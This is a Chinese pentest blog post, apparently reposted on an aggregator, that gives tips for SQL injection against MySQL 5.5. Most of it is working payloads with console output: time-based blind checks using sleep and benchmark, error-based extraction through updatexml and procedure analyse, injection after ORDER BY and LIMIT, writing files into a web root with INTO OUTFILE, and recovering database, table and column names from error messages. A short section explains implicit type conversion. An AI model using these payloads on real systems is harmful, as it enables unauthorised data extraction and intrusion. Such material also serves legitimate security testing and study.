美文网首页Pentest
SQL注入的一些tips

SQL注入的一些tips

作者: cws | 来源:发表于2018-05-31 10:48 被阅读18次

    原文链接:http://wyb0.com/posts/some-tips-for-sql-injection/

    环境:MySQL 5.5.47

    0x00 基于时间的注入payload

    mysql> select if((select database()) like "rte%",sleep(2),null);
    +---------------------------------------------------+
    | if((select database()) like "rte%",sleep(2),null) |
    +---------------------------------------------------+
    |                                                 0 |
    +---------------------------------------------------+
    1 row in set (2.00 sec)
    
    mysql> select if((select database())="rteaaa",sleep(2),666);
    +-----------------------------------------------+
    | if((select database())="rtest1",sleep(2),666) |
    +-----------------------------------------------+
    |                                           666 |
    +-----------------------------------------------+
    1 row in set (0.00 sec)
    
    mysql> select if((select database())="rtest",sleep(2),666);
    +----------------------------------------------+
    | if((select database())="rtest",sleep(2),666) |
    +----------------------------------------------+
    |                                            0 |
    +----------------------------------------------+
    1 row in set (2.00 sec)
    
    mysql> select id,name,title from msg where id=if(1=1,benchmark(10000000,md5(11)),false);
    Empty set (2.18 sec)
    
    mysql> select id,name,title from msg where id=if(1=2,benchmark(10000000,md5(11)),false);
    Empty set (0.00 sec)
    

    0x01 注入点在Order by后面

    mysql> select id,name,content from msg where id>1 order by id into outfile 'C:\\Apps\\phpStudy\\WWW\\a.txt';
    Query OK, 1 row affected (0.01 sec)
    
    mysql> select id,name,content from msg where id>1 order by updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1),0x7e),1);
    ERROR 1105 (HY000): XPATH syntax error: '~msg~'
    
    mysql> select id,name,content from msg where id>1 order by name procedure analyse(updatexml(1,concat(0x7e,database(),0x7e),1),1);
    ERROR 1105 (HY000): XPATH syntax error: '~rtest~'
    
    mysql> select name from msg where id>1 order by if(1=1,1,(select 1 union select 2));
    +----------+
    | name     |
    +----------+
    | xiaohong |
    +----------+
    1 row in set (0.00 sec)
    mysql> select name from msg where id>1 order by if(1=2,1,(select 1 union select 2));
    ERROR 1242 (21000): Subquery returns more than 1 row
    
    mysql> select name from msg where id>1 order by (select case when(2>1) then 1 else 1*(select 1 union select 2)end)=1;
    +----------+
    | name     |
    +----------+
    | xiaohong |
    +----------+
    1 row in set (0.00 sec)
    mysql> select name from msg where id>1 order by (select case when(2<1) then 1 else 1*(select 1 union select 2)end)=1;
    ERROR 1242 (21000): Subquery returns more than 1 row
    

    0x02 注入点在limit后面

    • limit前面没有order by可以使用union、analyse()
    mysql> select id,name,content from msg where id>1 limit 1,1 union select 1,2,3;
    +----+------+---------+
    | id | name | content |
    +----+------+---------+
    |  1 | 2    | 3       |
    +----+------+---------+
    1 row in set (0.01 sec)
    
    mysql> select id,name,content from msg where id>1 limit 1,1 procedure analyse();
    +-------------------+---------------+---------------+------------+------------+
    | Field_name        | Min_value     | Max_value     | Min_length | Max_length |
    +-------------------+---------------+---------------+------------+------------+
    | rtest.msg.name    | xiaohong      | xiaohong      |          8 |          8 |
    | rtest.msg.content | I have a cat. | I have a cat. |         13 |         13 |
    +-------------------+---------------+---------------+------------+------------+
    
    ------------------+-------+-------------------------+------+--------------------+
     Empties_or_zeros | Nulls | Avg_value_or_avg_length | Std  | Optimal_fieldtype  |
    ------------------+-------+-------------------------+------+--------------------+
         0 |     0 | 8.0000                  | NULL | ENUM('xiaohong') NOT NULL     |
         0 |     0 | 13.0000                 | NULL | ENUM('I have a cat.') NOT NULL|
    ------------------+-------+-------------------------+------+--------------------+
    2 rows in set (0.00 sec)
    
    • limit前面有order by则不可以使用union、analyse()
    mysql> select id,name,content from msg where id>1 limit 1,1 procedure analyse(updatexml(1,concat(0x7e,@@version,0x7e),1),1);
    ERROR 1105 (HY000): XPATH syntax error: '~5.5.47~'
    
    mysql> select id,name,content from msg where id>1 order by name limit 1,1 procedure analyse(updatexml(1,concat(0x7e,@@version,0x7e),1),1);
    ERROR 1105 (HY000): XPATH syntax error: '~5.5.47~'
    

    0x03 根据报错得到数据库名、表名、列名

    #得到数据库名为rtest
    mysql> select id,name,content from msg where id=2-a();
    ERROR 1305 (42000): FUNCTION rtest.a does not exist
    
    #得到表名为msg
    mysql> select id,name,content from msg where id=2 and polygon(1);
    ERROR 1367 (22007): Illegal non geometric '1' value found during parsing
    mysql> select id,name,content from msg where id=2 and polygon(id);
    ERROR 1367 (22007): Illegal non geometric '`rtest`.`msg`.`id`' value found during parsing
    
    #得到列名为id、name、content、useragent
    mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b)c);
    ERROR 1060 (42S21): Duplicate column name 'id'
    mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b using(id))c);
    ERROR 1060 (42S21): Duplicate column name 'name'
    mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b using(id,name))c);
    ERROR 1060 (42S21): Duplicate column name 'content'
    mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b using(id,name,content))c);
    ERROR 1060 (42S21): Duplicate column name 'useragent'
    mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b using(id,name,content,useragent))c);
    ERROR 1241 (21000): Operand should contain 1 column(s)
    

    0x04 MySQL的隐式转换

    • 官方隐式转换规则

      • 两个参数至少有一个是 NULL 时,比较的结果也是 NULL,例外是使用 <=> 对两个 NULL 做比较时会返回 1,这两种情况都不需要做类型转换
      • 两个参数都是字符串,会按照字符串来比较,不做类型转换
      • 两个参数都是整数,按照整数来比较,不做类型转换
      • 十六进制的值和非数字做比较时,会被当做二进制串
      • 有一个参数是 TIMESTAMP 或 DATETIME,并且另外一个参数是常量,常量会被转换为 timestamp
      • 有一个参数是 decimal 类型,如果另外一个参数是 decimal 或者整数,会将整数转换为 decimal 后进行比较,如果另外一个参数是浮点数,则会把 decimal 转换为浮点数进行比较
      • 所有其他情况下,两个参数都会被转换为浮点数再进行比较
    • 数字和字符进行运算时会转换为double类型

    mysql> select 2+'4'; #数字和字符会转换为数字
    +-------+
    | 2+'4' |
    +-------+
    |     6 |
    +-------+
    1 row in set (0.00 sec)
    
    mysql> select 'a'+'55'; #字符和字符会转换为数字
    +----------+
    | 'a'+'55' |
    +----------+
    |       55 |
    +----------+
    1 row in set, 1 warning (0.00 sec)
    
    mysql> select '33'+'32d11a';
    +-----------+
    | '33'+'3d' |
    +-----------+
    |        65 |
    +-----------+
    1 row in set, 1 warning (0.00 sec)
    
    • concat()函数将数字转换为字符
    mysql> select concat(3,'test'); #前面的数字1被转换为字符
    +------------------+
    | concat(3,'test') |
    +------------------+
    | 3test            |
    +------------------+
    1 row in set (0.00 sec)
    
    • name类型为string,查询条件为int 0时可以查询
    mysql> desc msg;
    +-----------+---------------+------+-----+---------+----------------+
    | Field     | Type          | Null | Key | Default | Extra          |
    +-----------+---------------+------+-----+---------+----------------+
    | id        | int(11)       | NO   | PRI | NULL    | auto_increment |
    | name      | varchar(30)   | NO   |     | NULL    |                |
    | content   | varchar(1024) | NO   |     | NULL    |                |
    | useragent | varchar(1024) | NO   |     | NULL    |                |
    +-----------+---------------+------+-----+---------+----------------+
    4 rows in set (0.01 sec)
    
    mysql> select id,name,content from msg where id=1 and name=0;
    +----+----------+--------------+
    | id | name     | content      |
    +----+----------+--------------+
    |  1 | xiaoming | hello world. |
    +----+----------+--------------+
    1 row in set, 2 warnings (0.00 sec)
    
    mysql> show warnings;
    +---------+------+----------------------------------------------+
    | Level   | Code | Message                                      |
    +---------+------+----------------------------------------------+
    | Warning | 1292 | Truncated incorrect DOUBLE value: 'xiaoming' |
    +---------+------+----------------------------------------------+
    2 rows in set (0.00 sec)
    
    
    mysql> select id,name,content from msg;
    +----+----------+---------------+
    | id | name     | content       |
    +----+----------+---------------+
    |  1 | xiaoming | hello world.  |
    |  2 | xiaohong | I have a cat. |
    |  3 | 55lihua  | ni hao        |
    +----+----------+---------------+
    3 rows in set (0.00 sec)
    
    mysql> select id,name,content from msg where name='li'+'55';
    +----+---------+---------+
    | id | name    | content |
    +----+---------+---------+
    |  3 | 55lihua | ni hao  |
    +----+---------+---------+
    1 row in set, 4 warnings (0.01 sec)
    
    mysql> show warnings;
    +---------+------+----------------------------------------------+
    | Level   | Code | Message                                      |
    +---------+------+----------------------------------------------+
    | Warning | 1292 | Truncated incorrect DOUBLE value: 'xiaoming' |
    | Warning | 1292 | Truncated incorrect DOUBLE value: 'li'       |
    | Warning | 1292 | Truncated incorrect DOUBLE value: 'xiaohong' |
    | Warning | 1292 | Truncated incorrect DOUBLE value: '55lihua'  |
    +---------+------+----------------------------------------------+
    4 rows in set (0.00 sec)
    

    Reference(侵删):

    相关文章

      网友评论

        本文标题:SQL注入的一些tips

        本文链接:https://www.haomeiwen.com/subject/ikxqsftx.html